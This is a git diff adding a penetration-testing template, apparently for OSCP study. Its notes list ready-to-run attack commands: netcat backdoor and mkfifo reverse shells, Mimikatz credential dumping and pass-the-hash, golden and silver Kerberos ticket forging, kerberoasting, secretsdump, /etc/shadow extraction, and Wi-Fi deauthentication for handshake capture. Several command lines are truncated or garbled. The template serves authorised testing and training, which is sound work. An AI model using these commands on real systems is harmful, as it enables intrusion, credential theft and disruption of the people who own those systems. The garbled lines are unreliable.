+- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md
new file mode 100644
index 0000000..93a442b
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md
@@ -0,0 +1,28 @@
+## Fundamentals:
+
+Connect to a netcat client:
+- rlwrap nc [IP Address] [port]
+
+Connect to a netcat Listener:
+
+- rlwrap nc -lvp [Localport]
+
+More info on rlwrap: https://linux.die.net/man/1/rlwrap
+
+## Backdoor Shells:
+
+Linux:
+
+- rlwrap nc [Your IP Address] -e /bin/sh
+- rlwrap nc [Your IP Address] -e /bin/bash
+- rlwrap nc [Your IP Address] -e /bin/zsh
+- rlwrap nc [Your IP Address] -e /bin/ash
+
+
+Windows:
+
+- rlwrap nc -lv [localport] -e cmd.exe
+
+Linux netcat reverse shell:
+
+- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md
new file mode 100644
index 0000000..e69de29
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md
new file mode 100644
index 0000000..d0e5f54
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md
@@ -0,0 +1,43 @@
+## Spawn a tty:
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources:
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack
+
+Windows:
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux:
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md
new file mode 100644
index 0000000..6f3c39f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md
@@ -0,0 +1,32 @@
+## Empire C2:
+
+Github: https://github.com/BC-SECURITY/Empire
+
+In Kali Linux:
+
+apt install powershell-empire
+
+Install Empire Manually:
+
+1. cd /Empire/setup
+2. ./install.sh
+
+- Current Listeners:
+
+(Empire) > listeners
+[!] No listeners currently active
+(Empire: listeners) > uselistener
+dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector
+
+
+## Covenant
+
+Source: https://github.com/cobbr/Covenant
+
+Installation on Kali:
+
+1. apt install dotnet-sdk-2.2
+2. git clone --recurse-submodules https://github.com/cobbr/Covenant
+3. cd Covenant/Covenant
+4. dotnet build
+5. dotnet run
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..e6f97be
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md
@@ -0,0 +1,22 @@
+## Source:
+
+https://github.com/BloodHoundAD/BloodHound
+
+## Pre-Compiled Binaries
+
+https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound:
+
+https://github.com/BloodHoundAD/SharpHound3
+
+## Bloodhound for python
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
+
+
+## Gather Data
+
+- import-module .\sharphound.ps1
+- invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash -domain-sid -domain -spn
+- python3 ticketer.py -aesKey -domain-sid -domain -spn
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash -domain-sid -domain
+- python3 ticketer.py -aesKey -domain-sid -domain
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt
+
+## Generating a silver ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user:
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md
new file mode 100644
index 0000000..0833644
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md
@@ -0,0 +1,26 @@
+# Source
+
+- https://github.com/GhostPack/Rubeus
+
+Review the opsec notes before compiling the program in visual studio.
+
+## ASREProasting:
+
+chek for users in the current domain:
+
+- Rubeus.exe asreproast /format: /outfile:
+
+## Kerberoasting:
+
+- Rubeus.exe kerberoast /outfile:
+
+- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
+
+## Pass the key (PTK):
+
+- .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt
+
+
+## Using the ticket on a Windows target:
+
+- Rubeus.exe ptt /ticket:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md
new file mode 100644
index 0000000..5ed0440
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md
@@ -0,0 +1,16 @@
+# Windows:
+
+- schtasks
+
+## Impacket:
+
+- python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo
+
+
+# Linux:
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
new file mode 100644
index 0000000..2f697ae
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
@@ -0,0 +1,36 @@
+## Capture Handshake
+
+1. airmon-ng start wlan0
+2. airodump-ng mon0 --write capture.cap -c 11
+3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
+
+Convert pcap files for john and hashcat
+
+/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
+/usr/sbin/hccap2john
+/usr/sbin/vncpcap2john
+/usr/sbin/wpapcap2john
+
+
+## Cracking Handshake with Aircrack
+
+- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap
+
+## Cracking Handshakes with Hashcat
+
+- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
+- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
+- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)
+
+## Cracking Handshakes with John The Ripper
+
+Did you run hccap2john?
+
+- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+
+
+
+Other Resources:
+
+https://github.com/lgandx/PCredz
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md
new file mode 100644
index 0000000..da4de42
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md
@@ -0,0 +1,61 @@
+
+## BENCHMARK TEST (HASH TYPE)
+
+- hashcat -b -m #type
+
+## SHOW EXAMPLE HASH
+
+- hashcat -m #type --example-hashes
+
+## DICTIONARY ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt
+
+DICTIONARY + RULES ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
+
+COMBINATION ATTACK
+
+- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
+
+## MASK ATTACK
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
+
+HYBRID DICTIONARY + MASK
+
+- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
+
+HYBRID MASK + DICTIONARY
+
+- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
+
+
+## INCREMENT
+
+DEFAULT INCREMENT
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
+
+INCREMENT MINIMUM LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
+
+INCREMENT MAX LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
+
+SESSION RESTORE
+
+- hashcat -a 0 -m #type --restore --session hash.txt dict.txt
+
+
+## Cracking krb5ts Keys
+
+- hashcat -m 13100 --force
+
+## Cracking Asrep keys
+
+- hashcat -a 0 -m 18200
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md
new file mode 100644
index 0000000..b110a6e
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md
@@ -0,0 +1,47 @@ +DICTIONARY ATTACK +- john --format=#type --wordlist=dict.txt hash.txt + +BRUTEFORCE ATTACK +- john --format=#type hash. txt + +MASK ATTACK +- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6 + +INCREMENTAL ATTACK +- john --incremental hash.txt + +DICTIONARY + RULES ATTACK +- john --format=#type --wordlist=dict.t + + +Other Notes: + +BENCHMARK TEST +- john --test + +SESSION NAME +- john hash.txt --session=example_name + +SESSION RESTORE +- john --restore=example_name + +SHOW CRACKED RESULTS +- john hash.txt --pot= --show + +WORDLIST GENERATION +- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt + +CRACKING SSH KEYS: + +- /usr/share/john/ssh2john.py id_rsa > hash.john +- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john + +CRACKING KRB5TGS KEYS + +- john --format=krb5tgs --wordlist= hashes.db + +## Impacket Tools: + +- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes + +If you have the NTDS.dit file and the SYSTEM hive: + +- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL + +# Linux + +Requires Root Privileges + +- cat /etc/shadow + +- cp /etc/passwd and shadow +- unshadow passwd shadow + +# OSX + +10.5-10.7 + +- dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat +/var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt + +10.8-10.12 + +- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ +0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - + +# Other Resources: + +- Lsassy: https://github.com/Hackndo/lsassy \ No newline at end of file diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md new file mode 100644 index 0000000..6db5b74 --- /dev/null 
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md
@@ -0,0 +1 @@
+# Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md
new file mode 100644
index 0000000..055c5d1
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md
@@ -0,0 +1,365 @@
+
+#
Offensive Security Lab/Exam Penetration Test Report
+
+![d2550626a1c94aeebd273d43be0669c9.png](../../_resources/d2550626a1c94aeebd273d43be0669c9.png)
+
+##
student@emailaddress.com Student-ID
+
+######
2020-XX-XX
+
+
+
+
+## Contents
+
+- 1 Offensive Security Exam Penetration Test Report
+ - 1.1 Introduction
+ - 1.2 Objective
+ - 1.3 Requirements
+- 2 High-Level Summary
+ - 2.1 Recommendations
+- 3 Methodologies
+ - 3.1 Information Gathering
+ - 3.2 Penetration
+ - 3.2.1 System IP: 192.168.x.x
+ - 3.2.1.1 Service Enumeration
+ - 3.2.1.2 Privilege Escalation
+ - 3.2.2 System IP: 192.168.x.x
+ - 3.2.2.1 Service Enumeration
+ - 3.2.2.2 Privilege Escalation
+ - 3.2.3 System IP: 192.168.x.x
+ - 3.2.3.1 Service Enumeration
+ - 3.2.3.2 Privilege Escalation
+ - 3.2.4 System IP: 192.168.x.x
+ - 3.2.4.1 Service Enumeration
+ - 3.2.4.2 Privilege Escalation
+ - 3.2.5 System IP: 192.168.x.x
+ - 3.3 Maintaining Access
+ - 3.4 House Cleaning
+- 4 Additional Items
+ - 4.1 Appendix - Proof and Local Contents:
+ - 4.2 Appendix - Metasploit/Meterpreter Usage
+
+
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
+This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
+- Any additional items that were not included
+
+
+
+# High-Level Summary
+
+I was tasked with performing an internal penetration test towards Offensive Security Exam.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
+My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
+When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, I had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - BOF
+
+## Recommendations
+
+I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+
+
+# Methodologies
+
+I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
+Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, I was tasked with exploiting the exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+
+## Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
+
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+
+
+### System IP: 192.168.x.x
+
+**Vulnerability Exploited: **
+
+**Proof Screenshot:**
+
+
+## Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+## House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+
+
+
+# Additional Items
+
+## Appendix - Proof and Local Contents:
+
+IP (Hostname) | Local.txt Contents | Proof.txt Contents
+--------------|--------------------|-------------------
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+192.168.x.x | hash_here | hash_here
+
+## Appendix - Metasploit/Meterpreter Usage
+
+For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
+
+
+
+
+
+![310x310.png](../../_resources/310x310.png)
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md
new file mode 100644
index 0000000..0fa6735
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md
@@ -0,0 +1,18 @@
+1. Understand who is going to be reading this and who is the target audience?
+2. The report needs to clear that a non-technical person would understand
+3. Report should include the following:
+ 1. Executive Summary
+ 2. Technical Summary
+ 3. Detail Report of findings
+ 4. Recommendations for remediation (If possible)
+
+
+
+Resources:
+
+- https://blog.zsec.uk/ltr101-pentest-reporting/
+- https://github.com/juliocesarfort/public-pentesting-reports
+
+Public Pentesting Reports:
+
+- https://github.com/juliocesarfort/public-pentesting-reports
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md
new file mode 100644
index 0000000..48f37e8
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md
@@ -0,0 +1,9 @@
